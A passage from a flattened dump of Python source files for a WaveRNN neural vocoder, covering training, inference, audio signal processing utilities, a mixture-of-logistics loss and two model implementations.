whitespace = ' ' headings, cells, = [], [] for item in item_tuples : heading, cell = str(item[0]), str(item[1]) pad_head = True if len(heading) < len(cell) else False pad = abs(len(heading) - len(cell)) pad = whitespace[:pad] pad_left = pad[:len(pad)//2] pad_right = pad[len(pad)//2:] if pad_head : heading = pad_left + heading + pad_right else : cell = pad_left + cell + pad_right headings += [heading] cells += [cell] border, head, body = '', '', '' for i in range(len(item_tuples)) : temp_head = f'| {headings[i]} ' temp_body = f'| {cells[i]} ' border += border_pattern[:len(temp_head)] head += temp_head body += temp_body if i == len(item_tuples) - 1 : head += '|' body += '|' border += '+' print(border) print(head) print(border) print(body) print(border) print(' ') def time_since(started) : elapsed = time.time() - started m = int(elapsed // 60) s = int(elapsed % 60) if m >= 60 : h = int(m // 60) m = m % 60 return f'{h}h {m}m {s}s' else : return f'{m}m {s}s' def save_attention(attn, path): import matplotlib.pyplot as plt fig = plt.figure(figsize=(12, 6)) plt.imshow(attn.T, interpolation='nearest', aspect='auto') fig.savefig(f'{path}.png', bbox_inches='tight') plt.close(fig) def save_spectrogram(M, path, length=None): import matplotlib.pyplot as plt M = np.flip(M, axis=0) if length : M = M[:, :length] fig = plt.figure(figsize=(12, 6)) plt.imshow(M, interpolation='nearest', aspect='auto') fig.savefig(f'{path}.png', bbox_inches='tight') plt.close(fig) def plot(array): import matplotlib.pyplot as plt fig = plt.figure(figsize=(30, 5)) ax = fig.add_subplot(111) ax.xaxis.label.set_color('grey') ax.yaxis.label.set_color('grey') ax.xaxis.label.set_fontsize(23) ax.yaxis.label.set_fontsize(23) ax.tick_params(axis='x', colors='grey', labelsize=23) ax.tick_params(axis='y', colors='grey', labelsize=23) plt.plot(array) def plot_spec(M): import matplotlib.pyplot as plt M = np.flip(M, axis=0) plt.figure(figsize=(18,4)) plt.imshow(M, interpolation='nearest', aspect='auto') plt.show() File: vocoder/distribution.py import numpy as np import torch import torch.nn.functional as F def log_sum_exp(x): """ numerically stable log_sum_exp implementation that prevents overflow """ # TF ordering axis = len(x.size()) - 1 m, _ = 
torch.max(x, dim=axis) m2, _ = torch.max(x, dim=axis, keepdim=True) return m + torch.log(torch.sum(torch.exp(x - m2), dim=axis)) # It is adapted from https://github.com/r9y9/wavenet_vocoder/blob/master/wavenet_vocoder/mixture.py def discretized_mix_logistic_loss(y_hat, y, num_classes=65536, log_scale_min=None, reduce=True): if log_scale_min is None: log_scale_min = float(np.log(1e-14)) y_hat = y_hat.permute(0,2,1) assert y_hat.dim() == 3 assert y_hat.size(1) % 3 == 0 nr_mix = y_hat.size(1) // 3 # (B x T x C) y_hat = y_hat.transpose(1, 2) # unpack parameters. (B, T, num_mixtures) x 3 logit_probs = y_hat[:, :, :nr_mix] means = y_hat[:, :, nr_mix:2 * nr_mix] log_scales = torch.clamp(y_hat[:, :, 2 * nr_mix:3 * nr_mix], min=log_scale_min) # B x T x 1 -> B x T x num_mixtures y = y.expand_as(means) centered_y = y - means inv_stdv = torch.exp(-log_scales) plus_in = inv_stdv * (centered_y + 1. / (num_classes - 1)) cdf_plus = torch.sigmoid(plus_in) min_in = inv_stdv * (centered_y - 1. / (num_classes - 1)) cdf_min = torch.sigmoid(min_in) # log probability for edge case of 0 (before scaling) # equivalent: torch.log(F.sigmoid(plus_in)) log_cdf_plus = plus_in - F.softplus(plus_in) # log probability for edge case of 255 (before scaling) # equivalent: (1 - F.sigmoid(min_in)).log() log_one_minus_cdf_min = -F.softplus(min_in) # probability for all other cases cdf_delta = cdf_plus - cdf_min mid_in = inv_stdv * centered_y # log probability in the center of the bin, to be used in extreme cases # (not actually used in our code) log_pdf_mid = mid_in - log_scales - 2. * F.softplus(mid_in) # tf equivalent """ log_probs = tf.where(x < -0.999, log_cdf_plus, tf.where(x > 0.999, log_one_minus_cdf_min, tf.where(cdf_delta > 1e-5, tf.log(tf.maximum(cdf_delta, 1e-12)), log_pdf_mid - np.log(127.5)))) """ # TODO: cdf_delta <= 1e-5 actually can happen. How can we choose the value # for num_classes=65536 case? 1e-7? not sure.. inner_inner_cond = (cdf_delta > 1e-5).float() inner_inner_out = inner_inner_cond * \ torch.log(torch.clamp(cdf_delta, min=1e-12)) + \ (1. - inner_inner_cond) * (log_pdf_mid - np.log((num_classes - 1) / 2)) inner_cond = (y > 0.999).float() inner_out = inner_cond * log_one_minus_cdf_min + (1. - inner_cond) * inner_inner_out cond = (y < -0.999).float() log_probs = cond * log_cdf_plus + (1. - cond) * inner_out log_probs = log_probs + F.log_softmax(logit_probs, -1) if reduce: return -torch.mean(log_sum_exp(log_probs)) else: return -log_sum_exp(log_probs).unsqueeze(-1) def sample_from_discretized_mix_logistic(y, log_scale_min=None): """ Sample from discretized mixture of logistic distributions Args: y (Tensor): B x C x T log_scale_min (float): Log scale minimum value Returns: Tensor: sample in range of [-1, 1]. 
""" if log_scale_min is None: log_scale_min = float(np.log(1e-14)) assert y.size(1) % 3 == 0 nr_mix = y.size(1) // 3 # B x T x C y = y.transpose(1, 2) logit_probs = y[:, :, :nr_mix] # sample mixture indicator from softmax temp = logit_probs.data.new(logit_probs.size()).uniform_(1e-5, 1.0 - 1e-5) temp = logit_probs.data - torch.log(- torch.log(temp)) _, argmax = temp.max(dim=-1) # (B, T) -> (B, T, nr_mix) one_hot = to_one_hot(argmax, nr_mix) # select logistic parameters means = torch.sum(y[:, :, nr_mix:2 * nr_mix] * one_hot, dim=-1) log_scales = torch.clamp(torch.sum( y[:, :, 2 * nr_mix:3 * nr_mix] * one_hot, dim=-1), min=log_scale_min) # sample from logistic & clip to interval # we don't actually round to the nearest 8bit value when sampling u = means.data.new(means.size()).uniform_(1e-5, 1.0 - 1e-5) x = means + torch.exp(log_scales) * (torch.log(u) - torch.log(1. - u)) x = torch.clamp(torch.clamp(x, min=-1.), max=1.) return x def to_one_hot(tensor, n, fill_with=1.): # we perform one hot encore with respect to the last axis one_hot = torch.FloatTensor(tensor.size() + (n,)).zero_() if tensor.is_cuda: one_hot = one_hot.cuda() one_hot.scatter_(len(tensor.size()), tensor.unsqueeze(-1), fill_with) return one_hot File: vocoder/train.py import time from pathlib import Path import numpy as np import torch import torch.nn.functional as F from torch import optim from torch.utils.data import DataLoader import vocoder.hparams as hp from vocoder.display import stream, simple_table from vocoder.distribution import discretized_mix_logistic_loss from vocoder.gen_wavernn import gen_testset from vocoder.models.fatchord_version import WaveRNN from vocoder.vocoder_dataset import VocoderDataset, collate_vocoder def train(run_id: str, syn_dir: Path, voc_dir: Path, models_dir: Path, ground_truth: bool, save_every: int, backup_every: int, force_restart: bool): # Check to make sure the hop length is correctly factorised assert np.cumprod(hp.voc_upsample_factors)[-1] == hp.hop_length # Instantiate the model print("Initializing the model...") model = WaveRNN( rnn_dims=hp.voc_rnn_dims, fc_dims=hp.voc_fc_dims, bits=hp.bits, pad=hp.voc_pad, upsample_factors=hp.voc_upsample_factors, feat_dims=hp.num_mels, compute_dims=hp.voc_compute_dims, res_out_dims=hp.voc_res_out_dims, res_blocks=hp.voc_res_blocks, hop_length=hp.hop_length, sample_rate=hp.sample_rate, mode=hp.voc_mode ) if torch.cuda.is_available(): model = model.cuda() # Initialize the optimizer optimizer = optim.Adam(model.parameters()) for p in optimizer.param_groups: p["lr"] = hp.voc_lr loss_func = F.cross_entropy if model.mode == "RAW" else discretized_mix_logistic_loss # Load the weights model_dir = models_dir / run_id model_dir.mkdir(exist_ok=True) weights_fpath = model_dir / "vocoder.pt" if force_restart or not weights_fpath.exists(): print("\nStarting the training of WaveRNN from scratch\n") model.save(weights_fpath, optimizer) else: print("\nLoading weights at %s" % weights_fpath) model.load(weights_fpath, optimizer) print("WaveRNN weights loaded from step %d" % model.step) # Initialize the dataset metadata_fpath = syn_dir.joinpath("train.txt") if ground_truth else \ voc_dir.joinpath("synthesized.txt") mel_dir = syn_dir.joinpath("mels") if ground_truth else voc_dir.joinpath("mels_gta") wav_dir = syn_dir.joinpath("audio") dataset = VocoderDataset(metadata_fpath, mel_dir, wav_dir) test_loader = DataLoader(dataset, batch_size=1, shuffle=True) # Begin the training simple_table([('Batch size', hp.voc_batch_size), ('LR', hp.voc_lr), ('Sequence Len', 
hp.voc_seq_len)]) for epoch in range(1, 350): data_loader = DataLoader(dataset, hp.voc_batch_size, shuffle=True, num_workers=2, collate_fn=collate_vocoder) start = time.time() running_loss = 0. for i, (x, y, m) in enumerate(data_loader, 1): if torch.cuda.is_available(): x, m, y = x.cuda(), m.cuda(), y.cuda() # Forward pass y_hat = model(x, m) if model.mode == 'RAW': y_hat = y_hat.transpose(1, 2).unsqueeze(-1) elif model.mode == 'MOL': y = y.float() y = y.unsqueeze(-1) # Backward pass loss = loss_func(y_hat, y) optimizer.zero_grad() loss.backward() optimizer.step() running_loss += loss.item() speed = i / (time.time() - start) avg_loss = running_loss / i step = model.get_step() k = step // 1000 if backup_every != 0 and step % backup_every == 0 : model.checkpoint(model_dir, optimizer) if save_every != 0 and step % save_every == 0 : model.save(weights_fpath, optimizer) msg = f"| Epoch: {epoch} ({i}/{len(data_loader)}) | " \ f"Loss: {avg_loss:.4f} | {speed:.1f} " \ f"steps/s | Step: {k}k | " stream(msg) gen_testset(model, test_loader, hp.voc_gen_at_checkpoint, hp.voc_gen_batched, hp.voc_target, hp.voc_overlap, model_dir) print("") File: vocoder/inference.py from vocoder.models.fatchord_version import WaveRNN from vocoder import hparams as hp import torch _model = None # type: WaveRNN def load_model(weights_fpath, verbose=True): global _model, _device if verbose: print("Building Wave-RNN") _model = WaveRNN( rnn_dims=hp.voc_rnn_dims, fc_dims=hp.voc_fc_dims, bits=hp.bits, pad=hp.voc_pad, upsample_factors=hp.voc_upsample_factors, feat_dims=hp.num_mels, compute_dims=hp.voc_compute_dims, res_out_dims=hp.voc_res_out_dims, res_blocks=hp.voc_res_blocks, hop_length=hp.hop_length, sample_rate=hp.sample_rate, mode=hp.voc_mode ) if torch.cuda.is_available(): _model = _model.cuda() _device = torch.device('cuda') else: _device = torch.device('cpu') if verbose: print("Loading model weights at %s" % weights_fpath) checkpoint = torch.load(weights_fpath, _device) _model.load_state_dict(checkpoint['model_state']) _model.eval() def is_loaded(): return _model is not None def infer_waveform(mel, normalize=True, batched=True, target=8000, overlap=800, progress_callback=None): """ Infers the waveform of a mel spectrogram output by the synthesizer (the format must match that of the synthesizer!) :param normalize: :param batched: :param target: :param overlap: :return: """ if _model is None: raise Exception("Please load Wave-RNN in memory before using it") if normalize: mel = mel / hp.mel_max_abs_value mel = torch.from_numpy(mel[None, ...]) wav = _model.generate(mel, batched, target, overlap, hp.mu_law, progress_callback) return wav File: vocoder/audio.py import math import numpy as np import librosa import vocoder.hparams as hp from scipy.signal import lfilter import soundfile as sf def label_2_float(x, bits) : return 2 * x / (2**bits - 1.) - 1. def float_2_label(x, bits) : assert abs(x).max() <= 1.0 x = (x + 1.) 
* (2**bits - 1) / 2 return x.clip(0, 2**bits - 1) def load_wav(path) : return librosa.load(str(path), sr=hp.sample_rate)[0] def save_wav(x, path) : sf.write(path, x.astype(np.float32), hp.sample_rate) def split_signal(x) : unsigned = x + 2**15 coarse = unsigned // 256 fine = unsigned % 256 return coarse, fine def combine_signal(coarse, fine) : return coarse * 256 + fine - 2**15 def encode_16bits(x) : return np.clip(x * 2**15, -2**15, 2**15 - 1).astype(np.int16) mel_basis = None def linear_to_mel(spectrogram): global mel_basis if mel_basis is None: mel_basis = build_mel_basis() return np.dot(mel_basis, spectrogram) def build_mel_basis(): return librosa.filters.mel(hp.sample_rate, hp.n_fft, n_mels=hp.num_mels, fmin=hp.fmin) def normalize(S): return np.clip((S - hp.min_level_db) / -hp.min_level_db, 0, 1) def denormalize(S): return (np.clip(S, 0, 1) * -hp.min_level_db) + hp.min_level_db def amp_to_db(x): return 20 * np.log10(np.maximum(1e-5, x)) def db_to_amp(x): return np.power(10.0, x * 0.05) def spectrogram(y): D = stft(y) S = amp_to_db(np.abs(D)) - hp.ref_level_db return normalize(S) def melspectrogram(y): D = stft(y) S = amp_to_db(linear_to_mel(np.abs(D))) return normalize(S) def stft(y): return librosa.stft(y=y, n_fft=hp.n_fft, hop_length=hp.hop_length, win_length=hp.win_length) def pre_emphasis(x): return lfilter([1, -hp.preemphasis], [1], x) def de_emphasis(x): return lfilter([1], [1, -hp.preemphasis], x) def encode_mu_law(x, mu) : mu = mu - 1 fx = np.sign(x) * np.log(1 + mu * np.abs(x)) / np.log(1 + mu) return np.floor((fx + 1) / 2 * mu + 0.5) def decode_mu_law(y, mu, from_labels=True) : if from_labels: y = label_2_float(y, math.log2(mu)) mu = mu - 1 x = np.sign(y) / mu * ((1 + mu) ** np.abs(y) - 1) return x File: vocoder/gen_wavernn.py from vocoder.models.fatchord_version import WaveRNN from vocoder.audio import * def gen_testset(model: WaveRNN, test_set, samples, batched, target, overlap, save_path): k = model.get_step() // 1000 for i, (m, x) in enumerate(test_set, 1): if i > samples: break print('\n| Generating: %i/%i' % (i, samples)) x = x[0].numpy() bits = 16 if hp.voc_mode == 'MOL' else hp.bits if hp.mu_law and hp.voc_mode != 'MOL' : x = decode_mu_law(x, 2**bits, from_labels=True) else : x = label_2_float(x, bits) save_wav(x, save_path.joinpath("%dk_steps_%d_target.wav" % (k, i))) batch_str = "gen_batched_target%d_overlap%d" % (target, overlap) if batched else \ "gen_not_batched" save_str = save_path.joinpath("%dk_steps_%d_%s.wav" % (k, i, batch_str)) wav = model.generate(m, batched, target, overlap, hp.mu_law) save_wav(wav, save_str) File: vocoder/models/fatchord_version.py import torch import torch.nn as nn import torch.nn.functional as F from vocoder.distribution import sample_from_discretized_mix_logistic from vocoder.display import * from vocoder.audio import * class ResBlock(nn.Module): def __init__(self, dims): super().__init__() self.conv1 = nn.Conv1d(dims, dims, kernel_size=1, bias=False) self.conv2 = nn.Conv1d(dims, dims, kernel_size=1, bias=False) self.batch_norm1 = nn.BatchNorm1d(dims) self.batch_norm2 = nn.BatchNorm1d(dims) def forward(self, x): residual = x x = self.conv1(x) x = self.batch_norm1(x) x = F.relu(x) x = self.conv2(x) x = self.batch_norm2(x) return x + residual class MelResNet(nn.Module): def __init__(self, res_blocks, in_dims, compute_dims, res_out_dims, pad): super().__init__() k_size = pad * 2 + 1 self.conv_in = nn.Conv1d(in_dims, compute_dims, kernel_size=k_size, bias=False) self.batch_norm = nn.BatchNorm1d(compute_dims) self.layers = 
nn.ModuleList() for i in range(res_blocks): self.layers.append(ResBlock(compute_dims)) self.conv_out = nn.Conv1d(compute_dims, res_out_dims, kernel_size=1) def forward(self, x): x = self.conv_in(x) x = self.batch_norm(x) x = F.relu(x) for f in self.layers: x = f(x) x = self.conv_out(x) return x class Stretch2d(nn.Module): def __init__(self, x_scale, y_scale): super().__init__() self.x_scale = x_scale self.y_scale = y_scale def forward(self, x): b, c, h, w = x.size() x = x.unsqueeze(-1).unsqueeze(3) x = x.repeat(1, 1, 1, self.y_scale, 1, self.x_scale) return x.view(b, c, h * self.y_scale, w * self.x_scale) class UpsampleNetwork(nn.Module): def __init__(self, feat_dims, upsample_scales, compute_dims, res_blocks, res_out_dims, pad): super().__init__() total_scale = np.cumproduct(upsample_scales)[-1] self.indent = pad * total_scale self.resnet = MelResNet(res_blocks, feat_dims, compute_dims, res_out_dims, pad) self.resnet_stretch = Stretch2d(total_scale, 1) self.up_layers = nn.ModuleList() for scale in upsample_scales: k_size = (1, scale * 2 + 1) padding = (0, scale) stretch = Stretch2d(scale, 1) conv = nn.Conv2d(1, 1, kernel_size=k_size, padding=padding, bias=False) conv.weight.data.fill_(1. / k_size[1]) self.up_layers.append(stretch) self.up_layers.append(conv) def forward(self, m): aux = self.resnet(m).unsqueeze(1) aux = self.resnet_stretch(aux) aux = aux.squeeze(1) m = m.unsqueeze(1) for f in self.up_layers: m = f(m) m = m.squeeze(1)[:, :, self.indent:-self.indent] return m.transpose(1, 2), aux.transpose(1, 2) class WaveRNN(nn.Module): def __init__(self, rnn_dims, fc_dims, bits, pad, upsample_factors, feat_dims, compute_dims, res_out_dims, res_blocks, hop_length, sample_rate, mode='RAW'): super().__init__() self.mode = mode self.pad = pad if self.mode == 'RAW' : self.n_classes = 2 ** bits elif self.mode == 'MOL' : self.n_classes = 30 else : RuntimeError("Unknown model mode value - ", self.mode) self.rnn_dims = rnn_dims self.aux_dims = res_out_dims // 4 self.hop_length = hop_length self.sample_rate = sample_rate self.upsample = UpsampleNetwork(feat_dims, upsample_factors, compute_dims, res_blocks, res_out_dims, pad) self.I = nn.Linear(feat_dims + self.aux_dims + 1, rnn_dims) self.rnn1 = nn.GRU(rnn_dims, rnn_dims, batch_first=True) self.rnn2 = nn.GRU(rnn_dims + self.aux_dims, rnn_dims, batch_first=True) self.fc1 = nn.Linear(rnn_dims + self.aux_dims, fc_dims) self.fc2 = nn.Linear(fc_dims + self.aux_dims, fc_dims) self.fc3 = nn.Linear(fc_dims, self.n_classes) self.step = nn.Parameter(torch.zeros(1).long(), requires_grad=False) self.num_params() def forward(self, x, mels): self.step += 1 bsize = x.size(0) if torch.cuda.is_available(): h1 = torch.zeros(1, bsize, self.rnn_dims).cuda() h2 = torch.zeros(1, bsize, self.rnn_dims).cuda() else: h1 = torch.zeros(1, bsize, self.rnn_dims).cpu() h2 = torch.zeros(1, bsize, self.rnn_dims).cpu() mels, aux = self.upsample(mels) aux_idx = [self.aux_dims * i for i in range(5)] a1 = aux[:, :, aux_idx[0]:aux_idx[1]] a2 = aux[:, :, aux_idx[1]:aux_idx[2]] a3 = aux[:, :, aux_idx[2]:aux_idx[3]] a4 = aux[:, :, aux_idx[3]:aux_idx[4]] x = torch.cat([x.unsqueeze(-1), mels, a1], dim=2) x = self.I(x) res = x x, _ = self.rnn1(x, h1) x = x + res res = x x = torch.cat([x, a2], dim=2) x, _ = self.rnn2(x, h2) x = x + res x = torch.cat([x, a3], dim=2) x = F.relu(self.fc1(x)) x = torch.cat([x, a4], dim=2) x = F.relu(self.fc2(x)) return self.fc3(x) def generate(self, mels, batched, target, overlap, mu_law, progress_callback=None): mu_law = mu_law if self.mode == 'RAW' else False 
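        # Overview of generate(): the conditioning mels are padded and upsampled,
        # optionally folded into overlapping segments (fold_with_overlap) so that
        # several segments are generated in one batch, samples are then drawn
        # autoregressively one timestep at a time using GRUCell copies of the
        # training GRUs, and xfade_and_unfold() finally crossfades the segments
        # back into a single waveform, with optional mu-law decoding,
        # de-emphasis, and a short fade-out at the end.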
progress_callback = progress_callback or self.gen_display self.eval() output = [] start = time.time() rnn1 = self.get_gru_cell(self.rnn1) rnn2 = self.get_gru_cell(self.rnn2) with torch.no_grad(): if torch.cuda.is_available(): mels = mels.cuda() else: mels = mels.cpu() wave_len = (mels.size(-1) - 1) * self.hop_length mels = self.pad_tensor(mels.transpose(1, 2), pad=self.pad, side='both') mels, aux = self.upsample(mels.transpose(1, 2)) if batched: mels = self.fold_with_overlap(mels, target, overlap) aux = self.fold_with_overlap(aux, target, overlap) b_size, seq_len, _ = mels.size() if torch.cuda.is_available(): h1 = torch.zeros(b_size, self.rnn_dims).cuda() h2 = torch.zeros(b_size, self.rnn_dims).cuda() x = torch.zeros(b_size, 1).cuda() else: h1 = torch.zeros(b_size, self.rnn_dims).cpu() h2 = torch.zeros(b_size, self.rnn_dims).cpu() x = torch.zeros(b_size, 1).cpu() d = self.aux_dims aux_split = [aux[:, :, d * i:d * (i + 1)] for i in range(4)] for i in range(seq_len): m_t = mels[:, i, :] a1_t, a2_t, a3_t, a4_t = (a[:, i, :] for a in aux_split) x = torch.cat([x, m_t, a1_t], dim=1) x = self.I(x) h1 = rnn1(x, h1) x = x + h1 inp = torch.cat([x, a2_t], dim=1) h2 = rnn2(inp, h2) x = x + h2 x = torch.cat([x, a3_t], dim=1) x = F.relu(self.fc1(x)) x = torch.cat([x, a4_t], dim=1) x = F.relu(self.fc2(x)) logits = self.fc3(x) if self.mode == 'MOL': sample = sample_from_discretized_mix_logistic(logits.unsqueeze(0).transpose(1, 2)) output.append(sample.view(-1)) if torch.cuda.is_available(): # x = torch.FloatTensor([[sample]]).cuda() x = sample.transpose(0, 1).cuda() else: x = sample.transpose(0, 1) elif self.mode == 'RAW' : posterior = F.softmax(logits, dim=1) distrib = torch.distributions.Categorical(posterior) sample = 2 * distrib.sample().float() / (self.n_classes - 1.) - 1. 
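                    # The categorical sample (an integer class index in
                    # [0, n_classes - 1]) has just been rescaled to a float
                    # waveform sample in [-1, 1]; it is appended to the output
                    # and fed back as the next timestep's input.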
output.append(sample) x = sample.unsqueeze(-1) else: raise RuntimeError("Unknown model mode value - ", self.mode) if i % 100 == 0: gen_rate = (i + 1) / (time.time() - start) * b_size / 1000 progress_callback(i, seq_len, b_size, gen_rate) output = torch.stack(output).transpose(0, 1) output = output.cpu().numpy() output = output.astype(np.float64) if batched: output = self.xfade_and_unfold(output, target, overlap) else: output = output[0] if mu_law: output = decode_mu_law(output, self.n_classes, False) if hp.apply_preemphasis: output = de_emphasis(output) # Fade-out at the end to avoid signal cutting out suddenly fade_out = np.linspace(1, 0, 20 * self.hop_length) output = output[:wave_len] output[-20 * self.hop_length:] *= fade_out self.train() return output def gen_display(self, i, seq_len, b_size, gen_rate): pbar = progbar(i, seq_len) msg = f'| {pbar} {i*b_size}/{seq_len*b_size} | Batch Size: {b_size} | Gen Rate: {gen_rate:.1f}kHz | ' stream(msg) def get_gru_cell(self, gru): gru_cell = nn.GRUCell(gru.input_size, gru.hidden_size) gru_cell.weight_hh.data = gru.weight_hh_l0.data gru_cell.weight_ih.data = gru.weight_ih_l0.data gru_cell.bias_hh.data = gru.bias_hh_l0.data gru_cell.bias_ih.data = gru.bias_ih_l0.data return gru_cell def pad_tensor(self, x, pad, side='both'): # NB - this is just a quick method i need right now # i.e., it won't generalise to other shapes/dims b, t, c = x.size() total = t + 2 * pad if side == 'both' else t + pad if torch.cuda.is_available(): padded = torch.zeros(b, total, c).cuda() else: padded = torch.zeros(b, total, c).cpu() if side == 'before' or side == 'both': padded[:, pad:pad + t, :] = x elif side == 'after': padded[:, :t, :] = x return padded def fold_with_overlap(self, x, target, overlap): ''' Fold the tensor with overlap for quick batched inference. Overlap will be used for crossfading in xfade_and_unfold() Args: x (tensor) : Upsampled conditioning features. shape=(1, timesteps, features) target (int) : Target timesteps for each index of batch overlap (int) : Timesteps for both xfade and rnn warmup Return: (tensor) : shape=(num_folds, target + 2 * overlap, features) Details: x = [[h1, h2, ... hn]] Where each h is a vector of conditioning features Eg: target=2, overlap=1 with x.size(1)=10 folded = [[h1, h2, h3, h4], [h4, h5, h6, h7], [h7, h8, h9, h10]] ''' _, total_len, features = x.size() # Calculate variables needed num_folds = (total_len - overlap) // (target + overlap) extended_len = num_folds * (overlap + target) + overlap remaining = total_len - extended_len # Pad if some time steps poking out if remaining != 0: num_folds += 1 padding = target + 2 * overlap - remaining x = self.pad_tensor(x, padding, side='after') if torch.cuda.is_available(): folded = torch.zeros(num_folds, target + 2 * overlap, features).cuda() else: folded = torch.zeros(num_folds, target + 2 * overlap, features).cpu() # Get the values for the folded tensor for i in range(num_folds): start = i * (target + overlap) end = start + target + 2 * overlap folded[i] = x[:, start:end, :] return folded def xfade_and_unfold(self, y, target, overlap): ''' Applies a crossfade and unfolds into a 1d array. 
Args: y (ndarry) : Batched sequences of audio samples shape=(num_folds, target + 2 * overlap) dtype=np.float64 overlap (int) : Timesteps for both xfade and rnn warmup Return: (ndarry) : audio samples in a 1d array shape=(total_len) dtype=np.float64 Details: y = [[seq1], [seq2], [seq3]] Apply a gain envelope at both ends of the sequences y = [[seq1_in, seq1_target, seq1_out], [seq2_in, seq2_target, seq2_out], [seq3_in, seq3_target, seq3_out]] Stagger and add up the groups of samples: [seq1_in, seq1_target, (seq1_out + seq2_in), seq2_target, ...] ''' num_folds, length = y.shape target = length - 2 * overlap total_len = num_folds * (target + overlap) + overlap # Need some silence for the rnn warmup silence_len = overlap // 2 fade_len = overlap - silence_len silence = np.zeros((silence_len), dtype=np.float64) # Equal power crossfade t = np.linspace(-1, 1, fade_len, dtype=np.float64) fade_in = np.sqrt(0.5 * (1 + t)) fade_out = np.sqrt(0.5 * (1 - t)) # Concat the silence to the fades fade_in = np.concatenate([silence, fade_in]) fade_out = np.concatenate([fade_out, silence]) # Apply the gain to the overlap samples y[:, :overlap] *= fade_in y[:, -overlap:] *= fade_out unfolded = np.zeros((total_len), dtype=np.float64) # Loop to add up all the samples for i in range(num_folds): start = i * (target + overlap) end = start + target + 2 * overlap unfolded[start:end] += y[i] return unfolded def get_step(self) : return self.step.data.item() def checkpoint(self, model_dir, optimizer) : k_steps = self.get_step() // 1000 self.save(model_dir.joinpath("checkpoint_%dk_steps.pt" % k_steps), optimizer) def log(self, path, msg) : with open(path, 'a') as f: print(msg, file=f) def load(self, path, optimizer) : checkpoint = torch.load(path) if "optimizer_state" in checkpoint: self.load_state_dict(checkpoint["model_state"]) optimizer.load_state_dict(checkpoint["optimizer_state"]) else: # Backwards compatibility self.load_state_dict(checkpoint) def save(self, path, optimizer) : torch.save({ "model_state": self.state_dict(), "optimizer_state": optimizer.state_dict(), }, path) def num_params(self, print_out=True): parameters = filter(lambda p: p.requires_grad, self.parameters()) parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000 if print_out : print('Trainable Parameters: %.3fM' % parameters) File: vocoder/models/deepmind_version.py import torch import torch.nn as nn import torch.nn.functional as F from utils.display import * from utils.dsp import * class WaveRNN(nn.Module) : def __init__(self, hidden_size=896, quantisation=256) : super(WaveRNN, self).__init__() self.hidden_size = hidden_size self.split_size = hidden_size // 2 # The main matmul self.R = nn.Linear(self.hidden_size, 3 * self.hidden_size, bias=False) # Output fc layers self.O1 = nn.Linear(self.split_size, self.split_size) self.O2 = nn.Linear(self.split_size, quantisation) self.O3 = nn.Linear(self.split_size, self.split_size) self.O4 = nn.Linear(self.split_size, quantisation) # Input fc layers self.I_coarse = nn.Linear(2, 3 * self.split_size, bias=False) self.I_fine = nn.Linear(3, 3 * self.split_size, bias=False) # biases for the gates self.bias_u = nn.Parameter(torch.zeros(self.hidden_size)) self.bias_r = nn.Parameter(torch.zeros(self.hidden_size)) self.bias_e = nn.Parameter(torch.zeros(self.hidden_size)) # display num params self.num_params() def forward(self, prev_y, prev_hidden, current_coarse) : # Main matmul - the projection is split 3 ways R_hidden = self.R(prev_hidden) R_u, R_r, R_e, = torch.split(R_hidden, self.hidden_size, 
dim=1) # Project the prev input coarse_input_proj = self.I_coarse(prev_y) I_coarse_u, I_coarse_r, I_coarse_e = \ torch.split(coarse_input_proj, self.split_size, dim=1) # Project the prev input and current coarse sample fine_input = torch.cat([prev_y, current_coarse], dim=1) fine_input_proj = self.I_fine(fine_input) I_fine_u, I_fine_r, I_fine_e = \ torch.split(fine_input_proj, self.split_size, dim=1) # concatenate for the gates I_u = torch.cat([I_coarse_u, I_fine_u], dim=1) I_r = torch.cat([I_coarse_r, I_fine_r], dim=1) I_e = torch.cat([I_coarse_e, I_fine_e], dim=1) # Compute all gates for coarse and fine u = F.sigmoid(R_u + I_u + self.bias_u) r = F.sigmoid(R_r + I_r + self.bias_r) e = F.tanh(r * R_e + I_e + self.bias_e) hidden = u * prev_hidden + (1. - u) * e # Split the hidden state hidden_coarse, hidden_fine = torch.split(hidden, self.split_size, dim=1) # Compute outputs out_coarse = self.O2(F.relu(self.O1(hidden_coarse))) out_fine = self.O4(F.relu(self.O3(hidden_fine))) return out_coarse, out_fine, hidden def generate(self, seq_len): with torch.no_grad(): # First split up the biases for the gates b_coarse_u, b_fine_u = torch.split(self.bias_u, self.split_size) b_coarse_r, b_fine_r = torch.split(self.bias_r, self.split_size) b_coarse_e, b_fine_e = torch.split(self.bias_e, self.split_size) # Lists for the two output seqs c_outputs, f_outputs = [], [] # Some initial inputs out_coarse = torch.LongTensor([0]).cuda() out_fine = torch.LongTensor([0]).cuda() # We'll meed a hidden state hidden = self.init_hidden() # Need a clock for display start = time.time() # Loop for generation for i in range(seq_len) : # Split into two hidden states hidden_coarse, hidden_fine = \ torch.split(hidden, self.split_size, dim=1) # Scale and concat previous predictions out_coarse = out_coarse.unsqueeze(0).float() / 127.5 - 1. out_fine = out_fine.unsqueeze(0).float() / 127.5 - 1. prev_outputs = torch.cat([out_coarse, out_fine], dim=1) # Project input coarse_input_proj = self.I_coarse(prev_outputs) I_coarse_u, I_coarse_r, I_coarse_e = \ torch.split(coarse_input_proj, self.split_size, dim=1) # Project hidden state and split 6 ways R_hidden = self.R(hidden) R_coarse_u , R_fine_u, \ R_coarse_r, R_fine_r, \ R_coarse_e, R_fine_e = torch.split(R_hidden, self.split_size, dim=1) # Compute the coarse gates u = F.sigmoid(R_coarse_u + I_coarse_u + b_coarse_u) r = F.sigmoid(R_coarse_r + I_coarse_r + b_coarse_r) e = F.tanh(r * R_coarse_e + I_coarse_e + b_coarse_e) hidden_coarse = u * hidden_coarse + (1. - u) * e # Compute the coarse output out_coarse = self.O2(F.relu(self.O1(hidden_coarse))) posterior = F.softmax(out_coarse, dim=1) distrib = torch.distributions.Categorical(posterior) out_coarse = distrib.sample() c_outputs.append(out_coarse) # Project the [prev outputs and predicted coarse sample] coarse_pred = out_coarse.float() / 127.5 - 1. fine_input = torch.cat([prev_outputs, coarse_pred.unsqueeze(0)], dim=1) fine_input_proj = self.I_fine(fine_input) I_fine_u, I_fine_r, I_fine_e = \ torch.split(fine_input_proj, self.split_size, dim=1) # Compute the fine gates u = F.sigmoid(R_fine_u + I_fine_u + b_fine_u) r = F.sigmoid(R_fine_r + I_fine_r + b_fine_r) e = F.tanh(r * R_fine_e + I_fine_e + b_fine_e) hidden_fine = u * hidden_fine + (1. 
